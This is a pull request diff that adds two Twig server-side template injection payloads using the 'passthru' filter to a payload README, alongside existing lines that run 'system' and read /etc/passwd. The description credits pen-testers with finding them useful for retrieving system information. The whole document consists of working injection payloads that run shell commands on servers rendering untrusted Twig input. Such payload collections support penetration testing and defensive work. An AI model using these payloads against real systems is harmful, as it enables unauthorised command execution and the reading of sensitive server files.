### PR TITLE
Added Twig 'passthru' filter exploits

### DIFF
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -966,6 +966,8 @@ $output = $twig > render (
 {{['id',1]|sort('system')|join}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id']|filter('passthru')}}
+{{['id']|map('passthru')}}
 ```
 
 Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)


### PR DESCRIPTION
Pen-testers I work with have discovered these filters can be used to retrieve sensitive system information. 